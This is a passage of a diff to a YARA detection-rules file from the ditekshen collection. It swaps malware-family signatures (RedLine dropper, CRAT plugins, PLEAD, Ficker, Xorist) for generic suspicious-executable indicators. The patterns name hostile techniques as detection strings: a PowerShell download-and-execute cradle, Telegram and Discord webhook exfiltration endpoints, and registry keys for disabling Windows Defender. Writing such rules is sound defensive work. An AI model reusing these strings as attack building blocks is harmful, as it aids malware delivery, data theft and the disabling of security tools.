 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43513aef0ed715f0c214d7a14e465350f9c1bcadf87535e1c12561e976398bb3"
-		score = 75
-		quality = 25
+		logic_hash = "ee06d3d9f2f7a294ce0f117d5838fe86ae77f98da0ba30551b0b42811227b1bd"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "%%IMPORT%%" fullword ascii
-		$s2 = "www6.%x%x.%s" fullword ascii
-		$s3 = "cdn.%x%x.%s" fullword ascii
-		$s4 = "api.%x%x.%s" fullword ascii
-		$s5 = "%s (admin)" fullword ascii
-		$s6 = "could not spawn %s: %d" fullword ascii
-		$s7 = "Could not kill %d: %d" fullword ascii
-		$s8 = "Could not connect to pipe (%s): %d" fullword ascii
-		$s9 = /%s\.\d[(%08x).]+\.%x%x\.%s/ ascii
-		$pwsh1 = "IEX (New-Object Net.Webclient).DownloadString('http" ascii
-		$pwsh2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$s1 = "TW96aWxsYS81LjAgK" ascii wide
+		$s2 = "TW96aWxsYS81LjAgKFdpbmRvd3M" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $pwsh* ) and 2 of ( $s* ) ) or ( #s9 > 6 and 4 of them ) )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Redlinedropperahk : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Winddefender_Antiemaulation : FILE
 {
 	meta:
-		description = "Detects AutoIt/AutoHotKey executables dropping RedLine infostealer"
+		description = "Detects executables containing potential Windows Defender anti-emulation checks"
 		author = "ditekSHen"
-		id = "16eee826-f1fd-5a6f-b6f3-e02ccd889614"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e7dca0e6-060b-5394-afc5-b3705a51d934"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1866-L1878"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1249-L1258"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0950fe9daa02f3a8fd527f75275766111be7e8774578963b0bdb455800dfc4f9"
-		score = 75
-		quality = 75
+		logic_hash = "76f8a532a59c2a7fcd45d9f9aed3ea2020889228c81410445728f42b6b9d891e"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-AHK"
+		importance = 20
 
 	strings:
-		$s1 = ".SetRequestHeader(\"User-Agent\",\" ( \" OSName \" | \" bit \" | \" CPUNAme \"\"" ascii
-		$s2 = ":= \" | Windows Defender\"" ascii
-		$s3 = "WindowSpy.ahk" wide
-		$s4 = ">AUTOHOTKEY SCRIPT<" fullword wide
+		$s1 = "JohnDoe" fullword ascii wide
+		$s2 = "HAL9TH" fullword ascii wide
 
 	condition:
 		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent01 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Attrib : FILE
 {
 	meta:
-		description = "Detects known downloader agent"
+		description = "Detects executables using attrib with suspicious attributes attributes"
 		author = "ditekSHen"
-		id = "85ead6fd-b56e-5e78-8fb4-7c9ecb4c0b58"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "69925f45-b8a9-516c-857c-7a687b32e0c6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1880-L1894"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1260-L1268"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aec81655af9b779a314c3e2cff933aa6426fcfe21b5a87e60e159c7e7f5238a"
-		score = 75
-		quality = 75
+		logic_hash = "2d26581037a34f32b3e3aa6df5570f0de0b9e070cbe6190318a99c6f147250d8"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		snort_sid = "920007"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent01"
+		importance = 20
 
 	strings:
-		$s1 = "Mozilla/5.0 Gecko/41.0 Firefox/41.0" fullword wide
-		$s2 = "/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List" fullword wide
-		$s3 = "GUID.log" fullword wide
-		$s4 = "NO AV" fullword wide
-		$s5 = "%d:%I64d:%I64d:%I64d" fullword wide
+		$s1 = "attrib +h +r +s" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Linux_PLEAD : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Clearmytracksbyprocess : FILE
 {
 	meta:
-		description = "PLEAD Linux payload"
+		description = "Detects executables calling ClearMyTracksByProcess"
 		author = "ditekSHen"
-		id = "07aa0561-d6d9-53b6-97ac-670cdf04335d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d548cf61-ffb7-5a21-9b76-246f8ffb6ad4"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1896-L1920"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1270-L1278"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "539998248ded0eb8ea1702c527804f89cfd55412f17ec699bd0af801f4fba673"
-		score = 75
-		quality = 75
+		logic_hash = "970bdf2cfebc5196204087de134b9d2f032d8074cacbb3b9cc2c859aab3a95fc"
+		score = 40
+		quality = 43
 		tags = "FILE"
-		clamav_sig = "MALWARE.Linux.Trojan.PLEAD"
+		importance = 20
 
 	strings:
-		$x1 = "CFileTransfer" ascii
-		$x2 = "CFileManager" ascii
-		$x3 = "CPortForward" ascii
-		$x4 = "CPortForwardManager" ascii
-		$x5 = "CRemoteShell" ascii
-		$x6 = "CSockClient" ascii
-		$s1 = "/proc/self/exe" fullword ascii
-		$s2 = "/bin/sh" fullword ascii
-		$s3 = "echo -e '" ascii
-		$s4 = "%s    <DIR>    %s" ascii
-		$s5 = "%s    %lld    %s" ascii
-		$s6 = "Files: %d        Size: %lld" ascii
-		$s7 = "Dirs: %d" ascii
-		$s8 = "%s(%s)/" ascii
-		$s9 = "%s %s %s %s" ascii
+		$s1 = "InetCpl.cpl,ClearMyTracksByProcess" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $x* ) or all of ( $s* ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_CRAT : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Dotnetprochook : FILE
 {
 	meta:
-		description = "Detects CRAT main DLL"
+		description = "Detects executables with potential process hoocking"
 		author = "ditekSHen"
-		id = "9757a8de-61ea-55c0-b64c-055798450985"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1c32c7ee-0ac6-50ae-892e-73f46902115d"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1922-L1944"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1280-L1291"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a9fef68e110a1564dd5956408abcc3736cfa6853e1ac5510a089cc68f6bdc35"
-		score = 75
-		quality = 75
+		logic_hash = "e01147886444f8080b7cf7b423dc70b4b08fae6b88a8875eb075530fdb9f7909"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "cmd /c \"dir %s /s >> %s\"" wide
-		$s2 = "Set-Cookie:\\b*{.+?}\\n" wide
-		$s3 = "Location: {[0-9]+}" wide
-		$s4 = "Content-Disposition: form-data; name=\"%s\"; filename=\"" ascii
-		$s6 = "%serror.log" wide
-		$v2x_1 = "?timestamp=%u" wide
-		$v2x_2 = "config.txt" wide
-		$v2x_3 = "entdll.dll" wide
-		$v2x_4 = "\\cmd.exe" wide
-		$v2x_5 = "[MyDocuments]" wide
-		$v2x_6 = "@SetWindowTextW FindFileExA" wide
-		$v2x_7 = "Microsoft\\Windows\\WinX\\Group1\\*.exe" wide
-		$v2s_1 = "Installed Anti Virus Programs" ascii
-		$v2s_2 = "Running Processes" ascii
-		$v2s_3 = "id=%u&content=" ascii
+		$s1 = "UnHook" fullword ascii
+		$s2 = "SetHook" fullword ascii
+		$s3 = "CallNextHook" fullword ascii
+		$s4 = "_hook" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 6 of ( $v2x* ) or all of ( $v2s* ) or ( 2 of ( $v2s* ) and 4 of ( $v2x* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginkeylogger : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Telegramchatbot : FILE
 {
 	meta:
-		description = "Detects CRAT keylogger plugin DLL"
+		description = "Detects executables using Telegram Chat Bot"
 		author = "ditekSHen"
-		id = "a8682786-7704-56f0-a6df-b4e2ab4d7536"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bcee52fe-495a-5ea1-bcd9-78b57c992752"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1946-L1962"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "58ef1f7466fcc871be2e74aa447c76970fd90c9d9d345a896fb8e6335114d189"
-		score = 75
-		quality = 75
+		logic_hash = "40374d9dda3d1896906f342725425860e83fbe6b5b0ac656a7035094e36340c0"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.CRAT"
+		importance = 20
 
 	strings:
-		$ai1 = "VM detected!" fullword wide
-		$ai2 = "Sandbox detected!" fullword wide
-		$ai3 = "Debug detected!" fullword wide
-		$ai4 = "Analysis process detected!" fullword wide
-		$s1 = "Create KeyLogMutex %s failure %d" wide
-		$s2 = "Key Log Mutex already created! %s" wide
-		$s3 = /KeyLogThread\s(started|finished|terminated)!/ wide
-		$s4 = /KeyLog_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		$s1 = "https://api.telegram.org/bot" ascii wide
+		$s2 = "/sendMessage?chat_id=" fullword ascii wide
+		$s3 = "Content-Disposition: form-data; name=\"" fullword ascii
+		$s4 = "/sendDocument?chat_id=" fullword ascii wide
+		$p1 = "/sendMessage" ascii wide
+		$p2 = "/sendDocument" ascii wide
+		$p3 = "&chat_id=" ascii wide
+		$p4 = "/sendLocation" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or ( 2 of ( $p* ) and 1 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginclipboardmonitor : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_B64_Artifacts : FILE
 {
 	meta:
-		description = "Detects CRAT Clipboad Monitor plugin DLL"
+		description = "Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc."
 		author = "ditekSHen"
-		id = "587487c7-f00b-5d4a-8b18-e46d6c6560e2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b76ba291-6af5-5800-a280-c04c84cc3f29"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1964-L1979"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1310-L1321"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3e692a06388e143a8e1053e75a6eb6a82da5bdf26d38e3a0e339bc20d8312a1"
-		score = 75
-		quality = 75
+		logic_hash = "35a7a9c0722d8bd174b272c659e62db3e9f41483dc3a9bf5f339b9066ed06c57"
+		score = 40
+		quality = 45
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$ai1 = "VM detected!" fullword wide
-		$ai2 = "Sandbox detected!" fullword wide
-		$ai3 = "Debug detected!" fullword wide
-		$ai4 = "Analysis process detected!" fullword wide
-		$s1 = "Clipboard Monitor Mutex [%s] already created!" wide
-		$s2 = "ClipboardMonitorThread started!" fullword wide
-		$s3 = /MonitorClipboardThread\s(finished|terminated)!/ wide
-		$s4 = /ClipboardMonitor_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		$s1 = "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA" ascii wide
+		$s2 = "L2Mgc2NodGFza3MgL2" ascii wide
+		$s3 = "QW1zaVNjYW5CdWZmZXI" ascii wide
+		$s4 = "VmlydHVhbFByb3RlY3Q" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginscreencapture : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Discordurl : FILE
 {
 	meta:
-		description = "Detects CRAT Screen Capture plugin DLL"
+		description = "Detects executables Discord URL observed in first stage droppers"
 		author = "ditekSHen"
-		id = "ef0b6b88-8b1b-5ab5-ad81-276eaff0411f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d7221bb4-48c5-5d80-ace1-95cf25fb585d"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1981-L2000"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1323-L1338"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7b4378ae883d01338fabe2eb50a5509b722c661e63afc287afa07b263a0ebc42"
-		score = 75
-		quality = 75
+		logic_hash = "7f600215268147f8e18f2b4eb6b2e9ba6dd44ab5603a140d3e1b2bb16ebb29c4"
+		score = 40
+		quality = 37
 		tags = "FILE"
+		importance = 20
 
-	strings:
-		$ai1 = "VM detected!" fullword wide
-		$ai2 = "Sandbox detected!" fullword wide
-		$ai3 = "Debug detected!" fullword wide
-		$ai4 = "Analysis process detected!" fullword wide
-		$s1 = "User is inactive!, give up capture" wide
-		$s2 = "Capturing screen..." wide
-		$s3 = "%s\\P%02d%lu.tmp" fullword wide
-		$s4 = "CloseHandle ScreenCaptureMutex failure! %d" fullword wide
-		$s5 = "ScreenCaptureMutex already created! %s" fullword wide
-		$s6 = "Create ScreenCaptureMutex %s failure %d" fullword wide
-		$s7 = /ScreenCaptureThread\s(finished|terminated)!/ wide
-		$s8 = /ScreenCapture_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+	strings:
+		$s1 = "https://discord.com/api/webhooks/" ascii wide nocase
+		$s2 = "https://cdn.discordapp.com/attachments/" ascii wide nocase
+		$s3 = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va" ascii wide
+		$s4 = "aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobW" ascii wide
+		$s5 = "/skoohbew/ipa/moc.drocsid//:sptth" ascii wide nocase
+		$s6 = "/stnemhcatta/moc.ppadrocsid.ndc//:sptth" ascii wide nocase
+		$s7 = "av9GaiV2dvkGch9SbvNmLkJ3bjNXak9yL6MHc0RHa" ascii wide
+		$s8 = "WboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_MALWARE_Win_Cratpluginransomhansom : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Regkeycomb_Disablewindefender : FILE
 {
 	meta:
-		description = "Detects CRAT Hansom Ransomware plugin DLL"
+		description = "Detects executables embedding registry key / value combination indicative of disabling Windows Defender features"
 		author = "ditekSHen"
-		id = "0bfc97df-545f-5453-afe0-5777dc1c95b4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "74c82d78-bdb3-54af-b04a-20d66ff123d7"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2002-L2020"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1448-L1470"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b22f6d22630f311241634513eb051df2b36af84a938c1ae1f5284e5a5d7d3077"
-		score = 75
-		quality = 48
+		logic_hash = "5a33052ded0823a8528590bd0da0023024db174f6f6a0766284c3195f5d3d41f"
+		score = 40
+		quality = 33
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$cmd1 = "/f /im \"%s\"" wide
-		$cmd2 = "add HKLM\\%s /v %s /t REG_DWORD /d %d /F" wide
-		$cmd3 = "add HKCU\\%s /v %s /t REG_DWORD /d %d /F" wide
-		$cmd4 = "\"%s\" a -y -ep -k -r -s -ibck -df -m0 -hp%s -ri1:%d \"%s\" \"%s\"" wide
-		$s1 = "\\hansom.jpg" wide
-		$s2 = "HansomMain" fullword ascii wide
-		$s3 = "ExtractHansom" fullword ascii wide
-		$s4 = "Hansom2008" fullword ascii
-		$s5 = ".hansomkey" fullword wide
-		$s6 = ".hansom" fullword wide
-		$s7 = /Ransom_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
+		$r1 = "SOFTWARE\\Policies\\Microsoft\\Windows Defender" ascii wide nocase
+		$k1 = "DisableAntiSpyware" ascii wide
+		$r2 = "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" ascii wide nocase
+		$k2 = "DisableBehaviorMonitoring" ascii wide
+		$k3 = "DisableOnAccessProtection" ascii wide
+		$k4 = "DisableScanOnRealtimeEnable" ascii wide
+		$r3 = "SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection" ascii wide nocase
+		$k5 = "vDisableRealtimeMonitoring" ascii wide
+		$r4 = "SOFTWARE\\Microsoft\\Windows Defender\\Spynet" ascii wide nocase
+		$k6 = "SpyNetReporting" ascii wide
+		$k7 = "SubmitSamplesConsent" ascii wide
+		$r5 = "SOFTWARE\\Microsoft\\Windows Defender\\Features" ascii wide nocase
+		$k8 = "TamperProtection" ascii wide
+		$r6 = "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" ascii wide nocase
+		$k9 = "Add-MpPreference -ExclusionPath \"{0}\"" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $cmd* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $cmd* ) ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $r* ) and 1 of ( $k* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Aliencrypter : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Regkeycomb_Iexecutecommandcom : FILE
 {
 	meta:
-		description = "Detects AlienCrypter injector/downloader/obfuscator"
+		description = "Detects executables embedding command execution via IExecuteCommand COM object"
 		author = "ditekSHen"
-		id = "af9e785a-bdec-5d3e-9a50-56f7f1a0507e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4bc7e6aa-1771-5c33-bc62-71072dec04cb"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2022-L2036"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1472-L1486"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "28a2a6e6d58fd6efbb5753a7be5b621a3eac546d45f9481b9dd2641cbe70b547"
-		score = 75
-		quality = 75
+		logic_hash = "269109f96f3fca5eacc19664b7b0c7f970131db29c47bfe1e9e67e56604bf1c1"
+		score = 40
+		quality = 43
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = ".AlienRunPE." ascii wide
-		$s2 = "RunAsNewUser_RunDLL" fullword wide
-		$s3 = { 00 50 52 4f 43 45 53 53 5f 53 55 53 50 45 4e 44 5f 52 45 53 55 4d 45 00 64 6e 6c 69 62 2e 50 45 00 }
-		$s4 = { 2e 41 6c 69 65 6e 52 75 6e 50 45 00 50 52 4f 43 45 53 53 5f 54 45 52 4d 49 4e 41 54 45 00 }
-		$s5 = "@@@http" wide
-		$resp1 = "</p><p>@@@77,90," ascii wide
-		$resp2 = "</p><p>@@@HH,JA," ascii wide
+		$r1 = "Classes\\Folder\\shell\\open\\command" ascii wide nocase
+		$k1 = "DelegateExecute" ascii wide
+		$s1 = "/EXEFilename \"{0}" ascii wide
+		$s2 = "/WindowState \"\"" ascii wide
+		$s3 = "/PriorityClass \"\"32\"\" /CommandLine \"" ascii wide
+		$s4 = "/StartDirectory \"" ascii wide
+		$s5 = "/RunAs" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 3 of them ) or ( 1 of ( $resp* ) and 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $r* ) and 1 of ( $k* ) ) or ( all of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Ficker : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_WMI_Enumeratevideodevice : FILE
 {
 	meta:
-		description = "Detects Ficker infostealer"
+		description = "Detects executables attemping to enumerate video devices using WMI"
 		author = "ditekSHen"
-		id = "1cfeea86-e8bf-50fb-ba08-435d7a14a913"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6d4ede5e-4ec5-5753-bd50-8e129ac532a4"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2038-L2055"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1488-L1502"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "adcc0ffc0e1ded36dc41c22d10d2ea293d5740484203892bcecf89a5f4001452"
-		score = 75
-		quality = 75
+		logic_hash = "8ef63d7a569ee1530a23d151ee394969f4b3b6bac28ed571f48e3f97b87d020a"
+		score = 40
+		quality = 41
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Ficker"
+		importance = 20
 
 	strings:
-		$s1 = "JNOde\\" ascii
-		$s2 = "\"SomeNone" fullword ascii
-		$s3 = "kindmessage" fullword ascii
-		$s4 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writting non-UTF-8 byte sequences" ascii
-		$s5 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii
-		$s6 = "(os error other os erroroperation interrruptedwrite zerotimed" ascii
-		$s7 = "(os error other os erroroperation interruptedwrite zerotimed" ascii
-		$s8 = "nPipeAlreadyExistsWouldBlockInvalidInputInvalidDataTimedOutWriteZeroInterruptedOtherN" fullword ascii
-		$s9 = "_matherr(): %s in %s(%g, %g)  (retval=%g)" ascii
+		$q1 = "Select * from Win32_CacheMemory" ascii wide nocase
+		$d1 = "{860BB310-5D01-11d0-BD3B-00A0C911CE86}" ascii wide
+		$d2 = "{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}" ascii wide
+		$d3 = "{55272A00-42CB-11CE-8135-00AA004BB851}" ascii wide
+		$d4 = "SYSTEM\\ControlSet001\\Control\\Class\\{4d36e968-e325-11ce-bfc1-08002be10318}\\000" ascii wide nocase
+		$d5 = "HardwareInformation.AdapterString" ascii wide
+		$d6 = "HardwareInformation.qwMemorySize" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $q* ) and 1 of ( $d* ) ) or 3 of ( $d* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Xorist : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Dcratby : FILE
 {
 	meta:
-		description = "Detects Xorist ransomware"
+		description = "Detects executables containing the string DcRatBy"
 		author = "ditekSHen"
-		id = "76119441-343d-51c3-90eb-9d54c80a983d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d8408cc0-0245-59b7-9134-1f4edd811df7"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2057-L2078"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1504-L1512"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b34e3fa065cabcd8d26908866e53ff599631128e1da884e42a2e63d890879eaa"
-		score = 75
-		quality = 75
+		logic_hash = "1a0f863fb71c84a9a01c3f07da0fdff9ea06b061f85532ac523d6a5d1e0e1e11"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Xorist"
+		importance = 20
 
 	strings:
-		$x1 = { 00 4d 00 41 00 47 00 45 00 0b 00 50 00 55 00
-                53 00 53 00 59 00 4c 00 49 00 43 00 4b 00 45
-                00 52 00 }
-		$x2 = { 30 70 33 6e 53 4f 75 72 63 33 20 58 30 72 31 35
-                37 2c 20 6d 6f 74 68 65 72 66 75 63 6b 65 72 21
-                00 70 75 73 73 79 6c 69 63 6b 65 72 00 2e 62 6d
-                70 00 2e 00 2e 2e 00 6f 70 65 6e 00 2e 65 78 65 }
-		$s1 = "\\shell\\open\\command" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii
-		$s3 = "CRYPTED!" fullword ascii
-		$s4 = "Attention!" fullword ascii
-		$s5 = "Password:" fullword ascii
-		$s6 = { 43 6f 6d 53 70 65 63 00 2f 63 20 64 65 6c 20 22 00 22 20 3e 3e 20 4e 55 4c }
+		$s1 = "DcRatBy" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_PYSA : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Anti_Winjail : FILE
 {
 	meta:
-		description = "Detects PYSA/Mespinoza ransomware"
+		description = "Detects executables potentially checking for WinJail sandbox window"
 		author = "ditekSHen"
-		id = "3a3fad6a-46bc-51dc-9723-4412034ca442"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f3a3d099-7659-50aa-8dca-3a2b1c18c3b5"
+		date = "2024-06-08"
+		modified = "2024-06-08"
